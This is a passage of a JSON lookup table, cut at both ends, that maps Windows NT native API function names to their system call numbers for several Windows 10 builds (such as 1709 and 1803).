"NtConnectPort": "156", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "157", "NtCreateDebugObject": "158", "NtCreateDirectoryObject": "159", "NtCreateDirectoryObjectEx": "160", "NtCreateEnclave": "161", "NtCreateEnlistment": "162", "NtCreateEventPair": "163", "NtCreateIRTimer": "164", "NtCreateIoCompletion": "165", "NtCreateJobObject": "166", "NtCreateJobSet": "167", "NtCreateKeyTransacted": "168", "NtCreateKeyedEvent": "169", "NtCreateLowBoxToken": "170", "NtCreateMailslotFile": "171", "NtCreateMutant": "172", "NtCreateNamedPipeFile": "173", "NtCreatePagingFile": "174", "NtCreatePartition": "175", "NtCreatePort": "176", "NtCreatePrivateNamespace": "177", "NtCreateProcess": "178", "NtCreateProfile": "179", "NtCreateProfileEx": "180", "NtCreateRegistryTransaction": "181", "NtCreateResourceManager": "182", "NtCreateSemaphore": "183", "NtCreateSymbolicLinkObject": "184", "NtCreateThreadEx": "185", "NtCreateTimer": "186", "NtCreateTimer2": "187", "NtCreateToken": "188", "NtCreateTokenEx": "189", "NtCreateTransaction": "190", "NtCreateTransactionManager": "191", "NtCreateUserProcess": "192", "NtCreateWaitCompletionPacket": "193", "NtCreateWaitablePort": "194", "NtCreateWnfStateName": "195", "NtCreateWorkerFactory": "196", "NtDebugActiveProcess": "197", "NtDebugContinue": "198", "NtDeleteAtom": "199", "NtDeleteBootEntry": "200", "NtDeleteDriverEntry": "201", "NtDeleteFile": "202", "NtDeleteKey": "203", "NtDeleteObjectAuditAlarm": "204", "NtDeletePrivateNamespace": "205", "NtDeleteValueKey": "206", "NtDeleteWnfStateData": "207", "NtDeleteWnfStateName": "208", "NtDisableLastKnownGood": "209", "NtDisplayString": "210", "NtDrawText": "211", "NtEnableLastKnownGood": "212", "NtEnumerateBootEntries": "213", "NtEnumerateDriverEntries": "214", "NtEnumerateSystemEnvironmentValuesEx": "215", "NtEnumerateTransactionObject": "216", "NtExtendSection": "217", "NtFilterBootOption": "218", "NtFilterToken": "219", "NtFilterTokenEx": "220", "NtFlushBuffersFileEx": "221", "NtFlushInstallUILanguage": "222", "NtFlushInstructionCache": "223", "NtFlushKey": "224", "NtFlushProcessWriteBuffers": "225", "NtFlushVirtualMemory": "226", "NtFlushWriteBuffer": "227", "NtFreeUserPhysicalPages": "228", "NtFreezeRegistry": "229", "NtFreezeTransactions": "230", "NtGetCachedSigningLevel": "231", "NtGetCompleteWnfStateSubscription": "232", "NtGetContextThread": "233", "NtGetCurrentProcessorNumber": "234", "NtGetCurrentProcessorNumberEx": "235", "NtGetDevicePowerState": "236", "NtGetMUIRegistryInfo": "237", "NtGetNextProcess": "238", "NtGetNextThread": "239", "NtGetNlsSectionPtr": "240", "NtGetNotificationResourceManager": "241", "NtGetWriteWatch": "242", "NtImpersonateAnonymousToken": "243", "NtImpersonateThread": "244", "NtInitializeEnclave": "245", "NtInitializeNlsFiles": "246", "NtInitializeRegistry": "247", "NtInitiatePowerAction": "248", "NtIsSystemResumeAutomatic": "249", "NtIsUILanguageComitted": "250", "NtListenPort": "251", "NtLoadDriver": "252", "NtLoadEnclaveData": "253", "NtLoadHotPatch": "254", "NtLoadKey": "255", "NtLoadKey2": "256", "NtLoadKeyEx": "257", "NtLockFile": "258", "NtLockProductActivationKeys": "259", "NtLockRegistryKey": "260", "NtLockVirtualMemory": "261", "NtMakePermanentObject": "262", "NtMakeTemporaryObject": "263", "NtManagePartition": "264", "NtMapCMFModule": "265", "NtMapUserPhysicalPages": "266", "NtModifyBootEntry": "267", "NtModifyDriverEntry": "268", "NtNotifyChangeDirectoryFile": "269", "NtNotifyChangeKey": "270", "NtNotifyChangeMultipleKeys": "271", "NtNotifyChangeSession": "272", "NtOpenEnlistment": "273", "NtOpenEventPair": "274", "NtOpenIoCompletion": "275", "NtOpenJobObject": "276", "NtOpenKeyEx": "277", "NtOpenKeyTransacted": "278", "NtOpenKeyTransactedEx": "279", "NtOpenKeyedEvent": "280", "NtOpenMutant": "281", "NtOpenObjectAuditAlarm": "282", "NtOpenPartition": "283", "NtOpenPrivateNamespace": "284", "NtOpenProcessToken": "285", "NtOpenRegistryTransaction": "286", "NtOpenResourceManager": "287", "NtOpenSemaphore": "288", "NtOpenSession": "289", "NtOpenSymbolicLinkObject": "290", "NtOpenThread": "291", "NtOpenTimer": "292", "NtOpenTransaction": "293", "NtOpenTransactionManager": "294", "NtPlugPlayControl": "295", "NtPrePrepareComplete": "296", "NtPrePrepareEnlistment": "297", "NtPrepareComplete": "298", "NtPrepareEnlistment": "299", "NtPrivilegeCheck": "300", "NtPrivilegeObjectAuditAlarm": "301", "NtPrivilegedServiceAuditAlarm": "302", "NtPropagationComplete": "303", "NtPropagationFailed": "304", "NtPulseEvent": "305", "NtQueryAuxiliaryCounterFrequency": "306", "NtQueryBootEntryOrder": "307", "NtQueryBootOptions": "308", "NtQueryDebugFilterState": "309", "NtQueryDirectoryObject": "310", "NtQueryDriverEntryOrder": "311", "NtQueryEaFile": "312", "NtQueryFullAttributesFile": "313", "NtQueryInformationAtom": "314", "NtQueryInformationByName": "315", "NtQueryInformationEnlistment": "316", "NtQueryInformationJobObject": "317", "NtQueryInformationPort": "318", "NtQueryInformationResourceManager": "319", "NtQueryInformationTransaction": "320", "NtQueryInformationTransactionManager": "321", "NtQueryInformationWorkerFactory": "322", "NtQueryInstallUILanguage": "323", "NtQueryIntervalProfile": "324", "NtQueryIoCompletion": "325", "NtQueryLicenseValue": "326", "NtQueryMultipleValueKey": "327", "NtQueryMutant": "328", "NtQueryOpenSubKeys": "329", "NtQueryOpenSubKeysEx": "330", "NtQueryPortInformationProcess": "331", "NtQueryQuotaInformationFile": "332", "NtQuerySecurityAttributesToken": "333", "NtQuerySecurityObject": "334", "NtQuerySecurityPolicy": "335", "NtQuerySemaphore": "336", "NtQuerySymbolicLinkObject": "337", "NtQuerySystemEnvironmentValue": "338", "NtQuerySystemEnvironmentValueEx": "339", "NtQuerySystemInformationEx": "340", "NtQueryTimerResolution": "341", "NtQueryWnfStateData": "342", "NtQueryWnfStateNameInformation": "343", "NtQueueApcThreadEx": "344", "NtRaiseException": "345", "NtRaiseHardError": "346", "NtReadOnlyEnlistment": "347", "NtRecoverEnlistment": "348", "NtRecoverResourceManager": "349", "NtRecoverTransactionManager": "350", "NtRegisterProtocolAddressInformation": "351", "NtRegisterThreadTerminatePort": "352", "NtReleaseKeyedEvent": "353", "NtReleaseWorkerFactoryWorker": "354", "NtRemoveIoCompletionEx": "355", "NtRemoveProcessDebug": "356", "NtRenameKey": "357", "NtRenameTransactionManager": "358", "NtReplaceKey": "359", "NtReplacePartitionUnit": "360", "NtReplyWaitReplyPort": "361", "NtRequestPort": "362", "NtResetEvent": "363", "NtResetWriteWatch": "364", "NtRestoreKey": "365", "NtResumeProcess": "366", "NtRevertContainerImpersonation": "367", "NtRollbackComplete": "368", "NtRollbackEnlistment": "369", "NtRollbackRegistryTransaction": "370", "NtRollbackTransaction": "371", "NtRollforwardTransactionManager": "372", "NtSaveKey": "373", "NtSaveKeyEx": "374", "NtSaveMergedKeys": "375", "NtSecureConnectPort": "376", "NtSerializeBoot": "377", "NtSetBootEntryOrder": "378", "NtSetBootOptions": "379", "NtSetCachedSigningLevel": "380", "NtSetCachedSigningLevel2": "381", "NtSetContextThread": "382", "NtSetDebugFilterState": "383", "NtSetDefaultHardErrorPort": "384", "NtSetDefaultLocale": "385", "NtSetDefaultUILanguage": "386", "NtSetDriverEntryOrder": "387", "NtSetEaFile": "388", "NtSetHighEventPair": "389", "NtSetHighWaitLowEventPair": "390", "NtSetIRTimer": "391", "NtSetInformationDebugObject": "392", "NtSetInformationEnlistment": "393", "NtSetInformationJobObject": "394", "NtSetInformationKey": "395", "NtSetInformationResourceManager": "396", "NtSetInformationSymbolicLink": "397", "NtSetInformationToken": "398", "NtSetInformationTransaction": "399", "NtSetInformationTransactionManager": "400", "NtSetInformationVirtualMemory": "401", "NtSetInformationWorkerFactory": "402", "NtSetIntervalProfile": "403", "NtSetIoCompletion": "404", "NtSetIoCompletionEx": "405", "NtSetLdtEntries": "406", "NtSetLowEventPair": "407", "NtSetLowWaitHighEventPair": "408", "NtSetQuotaInformationFile": "409", "NtSetSecurityObject": "410", "NtSetSystemEnvironmentValue": "411", "NtSetSystemEnvironmentValueEx": "412", "NtSetSystemInformation": "413", "NtSetSystemPowerState": "414", "NtSetSystemTime": "415", "NtSetThreadExecutionState": "416", "NtSetTimer2": "417", "NtSetTimerEx": "418", "NtSetTimerResolution": "419", "NtSetUuidSeed": "420", "NtSetVolumeInformationFile": "421", "NtSetWnfProcessNotificationEvent": "422", "NtShutdownSystem": "423", "NtShutdownWorkerFactory": "424", "NtSignalAndWaitForSingleObject": "425", "NtSinglePhaseReject": "426", "NtStartProfile": "427", "NtStopProfile": "428", "NtSubscribeWnfStateChange": "429", "NtSuspendProcess": "430", "NtSuspendThread": "431", "NtSystemDebugControl": "432", "NtTerminateJobObject": "433", "NtTestAlert": "434", "NtThawRegistry": "435", "NtThawTransactions": "436", "NtTraceControl": "437", "NtTranslateFilePath": "438", "NtUmsThreadYield": "439", "NtUnloadDriver": "440", "NtUnloadKey": "441", "NtUnloadKey2": "442", "NtUnloadKeyEx": "443", "NtUnlockFile": "444", "NtUnlockVirtualMemory": "445", "NtUnmapViewOfSectionEx": "446", "NtUnsubscribeWnfStateChange": "447", "NtUpdateWnfStateData": "448", "NtVdmControl": "449", "NtWaitForAlertByThreadId": "450", "NtWaitForDebugEvent": "451", "NtWaitForKeyedEvent": "452", "NtWaitForWorkViaWorkerFactory": "453", "NtWaitHighEventPair": "454", "NtWaitLowEventPair": "455"}, "1709": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAlpcAcceptConnectPort": "116", "NtAlpcCancelMessage": "117", "NtAlpcConnectPort": "118", "NtAlpcConnectPortEx": "119", "NtAlpcCreatePort": "120", "NtAlpcCreatePortSection": "121", "NtAlpcCreateResourceReserve": "122", "NtAlpcCreateSectionView": "123", "NtAlpcCreateSecurityContext": "124", "NtAlpcDeletePortSection": "125", "NtAlpcDeleteResourceReserve": "126", "NtAlpcDeleteSectionView": "127", "NtAlpcDeleteSecurityContext": "128", "NtAlpcDisconnectPort": "129", "NtAlpcImpersonateClientContainerOfPort": "130", "NtAlpcImpersonateClientOfPort": "131", "NtAlpcOpenSenderProcess": "132", "NtAlpcOpenSenderThread": "133", "NtAlpcQueryInformation": "134", "NtAlpcQueryInformationMessage": "135", "NtAlpcRevokeSecurityContext": "136", "NtAlpcSendWaitReceivePort": "137", "NtAlpcSetInformation": "138", "NtAreMappedFilesTheSame": "139", "NtAssignProcessToJobObject": "140", "NtAssociateWaitCompletionPacket": "141", "NtCallEnclave": "142", "NtCancelIoFileEx": "143", "NtCancelSynchronousIoFile": "144", "NtCancelTimer2": "145", "NtCancelWaitCompletionPacket": "146", "NtCommitComplete": "147", "NtCommitEnlistment": "148", "NtCommitRegistryTransaction": "149", "NtCommitTransaction": "150", "NtCompactKeys": "151", "NtCompareObjects": "152", "NtCompareSigningLevels": "153", "NtCompareTokens": "154", "NtCompleteConnectPort": "155", "NtCompressKey": "156", "NtConnectPort": "157", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "158", "NtCreateDebugObject": "159", "NtCreateDirectoryObject": "160", "NtCreateDirectoryObjectEx": "161", "NtCreateEnclave": "162", "NtCreateEnlistment": "163", "NtCreateEventPair": "164", "NtCreateIRTimer": "165", "NtCreateIoCompletion": "166", "NtCreateJobObject": "167", "NtCreateJobSet": "168", "NtCreateKeyTransacted": "169", "NtCreateKeyedEvent": "170", "NtCreateLowBoxToken": "171", "NtCreateMailslotFile": "172", "NtCreateMutant": "173", "NtCreateNamedPipeFile": "174", "NtCreatePagingFile": "175", "NtCreatePartition": "176", "NtCreatePort": "177", "NtCreatePrivateNamespace": "178", "NtCreateProcess": "179", "NtCreateProfile": "180", "NtCreateProfileEx": "181", "NtCreateRegistryTransaction": "182", "NtCreateResourceManager": "183", "NtCreateSemaphore": "184", "NtCreateSymbolicLinkObject": "185", "NtCreateThreadEx": "186", "NtCreateTimer": "187", "NtCreateTimer2": "188", "NtCreateToken": "189", "NtCreateTokenEx": "190", "NtCreateTransaction": "191", "NtCreateTransactionManager": "192", "NtCreateUserProcess": "193", "NtCreateWaitCompletionPacket": "194", "NtCreateWaitablePort": "195", "NtCreateWnfStateName": "196", "NtCreateWorkerFactory": "197", "NtDebugActiveProcess": "198", "NtDebugContinue": "199", "NtDeleteAtom": "200", "NtDeleteBootEntry": "201", "NtDeleteDriverEntry": "202", "NtDeleteFile": "203", "NtDeleteKey": "204", "NtDeleteObjectAuditAlarm": "205", "NtDeletePrivateNamespace": "206", "NtDeleteValueKey": "207", "NtDeleteWnfStateData": "208", "NtDeleteWnfStateName": "209", "NtDisableLastKnownGood": "210", "NtDisplayString": "211", "NtDrawText": "212", "NtEnableLastKnownGood": "213", "NtEnumerateBootEntries": "214", "NtEnumerateDriverEntries": "215", "NtEnumerateSystemEnvironmentValuesEx": "216", "NtEnumerateTransactionObject": "217", "NtExtendSection": "218", "NtFilterBootOption": "219", "NtFilterToken": "220", "NtFilterTokenEx": "221", "NtFlushBuffersFileEx": "222", "NtFlushInstallUILanguage": "223", "NtFlushInstructionCache": "224", "NtFlushKey": "225", "NtFlushProcessWriteBuffers": "226", "NtFlushVirtualMemory": "227", "NtFlushWriteBuffer": "228", "NtFreeUserPhysicalPages": "229", "NtFreezeRegistry": "230", "NtFreezeTransactions": "231", "NtGetCachedSigningLevel": "232", "NtGetCompleteWnfStateSubscription": "233", "NtGetContextThread": "234", "NtGetCurrentProcessorNumber": "235", "NtGetCurrentProcessorNumberEx": "236", "NtGetDevicePowerState": "237", "NtGetMUIRegistryInfo": "238", "NtGetNextProcess": "239", "NtGetNextThread": "240", "NtGetNlsSectionPtr": "241", "NtGetNotificationResourceManager": "242", "NtGetWriteWatch": "243", "NtImpersonateAnonymousToken": "244", "NtImpersonateThread": "245", "NtInitializeEnclave": "246", "NtInitializeNlsFiles": "247", "NtInitializeRegistry": "248", "NtInitiatePowerAction": "249", "NtIsSystemResumeAutomatic": "250", "NtIsUILanguageComitted": "251", "NtListenPort": "252", "NtLoadDriver": "253", "NtLoadEnclaveData": "254", "NtLoadHotPatch": "255", "NtLoadKey": "256", "NtLoadKey2": "257", "NtLoadKeyEx": "258", "NtLockFile": "259", "NtLockProductActivationKeys": "260", "NtLockRegistryKey": "261", "NtLockVirtualMemory": "262", "NtMakePermanentObject": "263", "NtMakeTemporaryObject": "264", "NtManagePartition": "265", "NtMapCMFModule": "266", "NtMapUserPhysicalPages": "267", "NtModifyBootEntry": "268", "NtModifyDriverEntry": "269", "NtNotifyChangeDirectoryFile": "270", "NtNotifyChangeDirectoryFileEx": "271", "NtNotifyChangeKey": "272", "NtNotifyChangeMultipleKeys": "273", "NtNotifyChangeSession": "274", "NtOpenEnlistment": "275", "NtOpenEventPair": "276", "NtOpenIoCompletion": "277", "NtOpenJobObject": "278", "NtOpenKeyEx": "279", "NtOpenKeyTransacted": "280", "NtOpenKeyTransactedEx": "281", "NtOpenKeyedEvent": "282", "NtOpenMutant": "283", "NtOpenObjectAuditAlarm": "284", "NtOpenPartition": "285", "NtOpenPrivateNamespace": "286", "NtOpenProcessToken": "287", "NtOpenRegistryTransaction": "288", "NtOpenResourceManager": "289", "NtOpenSemaphore": "290", "NtOpenSession": "291", "NtOpenSymbolicLinkObject": "292", "NtOpenThread": "293", "NtOpenTimer": "294", "NtOpenTransaction": "295", "NtOpenTransactionManager": "296", "NtPlugPlayControl": "297", "NtPrePrepareComplete": "298", "NtPrePrepareEnlistment": "299", "NtPrepareComplete": "300", "NtPrepareEnlistment": "301", "NtPrivilegeCheck": "302", "NtPrivilegeObjectAuditAlarm": "303", "NtPrivilegedServiceAuditAlarm": "304", "NtPropagationComplete": "305", "NtPropagationFailed": "306", "NtPulseEvent": "307", "NtQueryAuxiliaryCounterFrequency": "308", "NtQueryBootEntryOrder": "309", "NtQueryBootOptions": "310", "NtQueryDebugFilterState": "311", "NtQueryDirectoryFileEx": "312", "NtQueryDirectoryObject": "313", "NtQueryDriverEntryOrder": "314", "NtQueryEaFile": "315", "NtQueryFullAttributesFile": "316", "NtQueryInformationAtom": "317", "NtQueryInformationByName": "318", "NtQueryInformationEnlistment": "319", "NtQueryInformationJobObject": "320", "NtQueryInformationPort": "321", "NtQueryInformationResourceManager": "322", "NtQueryInformationTransaction": "323", "NtQueryInformationTransactionManager": "324", "NtQueryInformationWorkerFactory": "325", "NtQueryInstallUILanguage": "326", "NtQueryIntervalProfile": "327", "NtQueryIoCompletion": "328", "NtQueryLicenseValue": "329", "NtQueryMultipleValueKey": "330", "NtQueryMutant": "331", "NtQueryOpenSubKeys": "332", "NtQueryOpenSubKeysEx": "333", "NtQueryPortInformationProcess": "334", "NtQueryQuotaInformationFile": "335", "NtQuerySecurityAttributesToken": "336", "NtQuerySecurityObject": "337", "NtQuerySecurityPolicy": "338", "NtQuerySemaphore": "339", "NtQuerySymbolicLinkObject": "340", "NtQuerySystemEnvironmentValue": "341", "NtQuerySystemEnvironmentValueEx": "342", "NtQuerySystemInformationEx": "343", "NtQueryTimerResolution": "344", "NtQueryWnfStateData": "345", "NtQueryWnfStateNameInformation": "346", "NtQueueApcThreadEx": "347", "NtRaiseException": "348", "NtRaiseHardError": "349", "NtReadOnlyEnlistment": "350", "NtRecoverEnlistment": "351", "NtRecoverResourceManager": "352", "NtRecoverTransactionManager": "353", "NtRegisterProtocolAddressInformation": "354", "NtRegisterThreadTerminatePort": "355", "NtReleaseKeyedEvent": "356", "NtReleaseWorkerFactoryWorker": "357", "NtRemoveIoCompletionEx": "358", "NtRemoveProcessDebug": "359", "NtRenameKey": "360", "NtRenameTransactionManager": "361", "NtReplaceKey": "362", "NtReplacePartitionUnit": "363", "NtReplyWaitReplyPort": "364", "NtRequestPort": "365", "NtResetEvent": "366", "NtResetWriteWatch": "367", "NtRestoreKey": "368", "NtResumeProcess": "369", "NtRevertContainerImpersonation": "370", "NtRollbackComplete": "371", "NtRollbackEnlistment": "372", "NtRollbackRegistryTransaction": "373", "NtRollbackTransaction": "374", "NtRollforwardTransactionManager": "375", "NtSaveKey": "376", "NtSaveKeyEx": "377", "NtSaveMergedKeys": "378", "NtSecureConnectPort": "379", "NtSerializeBoot": "380", "NtSetBootEntryOrder": "381", "NtSetBootOptions": "382", "NtSetCachedSigningLevel": "383", "NtSetCachedSigningLevel2": "384", "NtSetContextThread": "385", "NtSetDebugFilterState": "386", "NtSetDefaultHardErrorPort": "387", "NtSetDefaultLocale": "388", "NtSetDefaultUILanguage": "389", "NtSetDriverEntryOrder": "390", "NtSetEaFile": "391", "NtSetHighEventPair": "392", "NtSetHighWaitLowEventPair": "393", "NtSetIRTimer": "394", "NtSetInformationDebugObject": "395", "NtSetInformationEnlistment": "396", "NtSetInformationJobObject": "397", "NtSetInformationKey": "398", "NtSetInformationResourceManager": "399", "NtSetInformationSymbolicLink": "400", "NtSetInformationToken": "401", "NtSetInformationTransaction": "402", "NtSetInformationTransactionManager": "403", "NtSetInformationVirtualMemory": "404", "NtSetInformationWorkerFactory": "405", "NtSetIntervalProfile": "406", "NtSetIoCompletion": "407", "NtSetIoCompletionEx": "408", "NtSetLdtEntries": "409", "NtSetLowEventPair": "410", "NtSetLowWaitHighEventPair": "411", "NtSetQuotaInformationFile": "412", "NtSetSecurityObject": "413", "NtSetSystemEnvironmentValue": "414", "NtSetSystemEnvironmentValueEx": "415", "NtSetSystemInformation": "416", "NtSetSystemPowerState": "417", "NtSetSystemTime": "418", "NtSetThreadExecutionState": "419", "NtSetTimer2": "420", "NtSetTimerEx": "421", "NtSetTimerResolution": "422", "NtSetUuidSeed": "423", "NtSetVolumeInformationFile": "424", "NtSetWnfProcessNotificationEvent": "425", "NtShutdownSystem": "426", "NtShutdownWorkerFactory": "427", "NtSignalAndWaitForSingleObject": "428", "NtSinglePhaseReject": "429", "NtStartProfile": "430", "NtStopProfile": "431", "NtSubscribeWnfStateChange": "432", "NtSuspendProcess": "433", "NtSuspendThread": "434", "NtSystemDebugControl": "435", "NtTerminateEnclave": "436", "NtTerminateJobObject": "437", "NtTestAlert": "438", "NtThawRegistry": "439", "NtThawTransactions": "440", "NtTraceControl": "441", "NtTranslateFilePath": "442", "NtUmsThreadYield": "443", "NtUnloadDriver": "444", "NtUnloadKey": "445", "NtUnloadKey2": "446", "NtUnloadKeyEx": "447", "NtUnlockFile": "448", "NtUnlockVirtualMemory": "449", "NtUnmapViewOfSectionEx": "450", "NtUnsubscribeWnfStateChange": "451", "NtUpdateWnfStateData": "452", "NtVdmControl": "453", "NtWaitForAlertByThreadId": "454", "NtWaitForDebugEvent": "455", "NtWaitForKeyedEvent": "456", "NtWaitForWorkViaWorkerFactory": "457", "NtWaitHighEventPair": "458", "NtWaitLowEventPair": "459"}, "1803": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAllocateVirtualMemoryEx": "116", "NtAlpcAcceptConnectPort": "117", "NtAlpcCancelMessage": "118", "NtAlpcConnectPort": "119", "NtAlpcConnectPortEx": "120", "NtAlpcCreatePort": "121", "NtAlpcCreatePortSection": "122", "NtAlpcCreateResourceReserve": "123", "NtAlpcCreateSectionView": "124", "NtAlpcCreateSecurityContext": "125", "NtAlpcDeletePortSection": "126", "NtAlpcDeleteResourceReserve": "127", "NtAlpcDeleteSectionView": "128", "NtAlpcDeleteSecurityContext": "129", "NtAlpcDisconnectPort": "130", "NtAlpcImpersonateClientContainerOfPort": "131", "NtAlpcImpersonateClientOfPort": "132", "NtAlpcOpenSenderProcess": "133", "NtAlpcOpenSenderThread": "134", "NtAlpcQueryInformation": "135", "NtAlpcQueryInformationMessage": "136", "NtAlpcRevokeSecurityContext": "137", "NtAlpcSendWaitReceivePort": "138", "NtAlpcSetInformation": "139", "NtAreMappedFilesTheSame": "140", "NtAssignProcessToJobObject": "141", "NtAssociateWaitCompletionPacket": "142", "NtCallEnclave": "143", "NtCancelIoFileEx": "144", "NtCancelSynchronousIoFile": "145", "NtCancelTimer2": "146", "NtCancelWaitCompletionPacket": "147", "NtCommitComplete": "148", "NtCommitEnlistment": "149", "NtCommitRegistryTransaction": "150", "NtCommitTransaction": "151", "NtCompactKeys": "152", "NtCompareObjects": "153", "NtCompareSigningLevels": "154", "NtCompareTokens": "155", "NtCompleteConnectPort": "156", "NtCompressKey": "157", "NtConnectPort": "158", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "159", "NtCreateDebugObject": "160", "NtCreateDirectoryObject": "161", "NtCreateDirectoryObjectEx": "162", "NtCreateEnclave": "163", 